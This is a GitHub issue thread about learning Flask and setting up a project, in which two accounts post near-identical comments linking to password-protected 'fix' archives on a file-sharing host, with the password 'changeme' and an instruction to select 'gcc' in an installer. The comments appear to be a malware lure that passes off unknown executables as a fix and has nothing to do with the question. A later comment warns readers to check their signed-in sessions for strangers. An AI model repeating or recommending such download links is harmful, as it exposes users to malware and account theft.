### ISSUE TITLE
Learning Flask and setting up project

### ISSUE THREAD

**Issue by mukund1712** [BlockChef/ig-feed-generator#10]

**Comment by HarbingerOfFire** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HarbingerOfFire** [comment]
Check your signed in sessions for unknown people
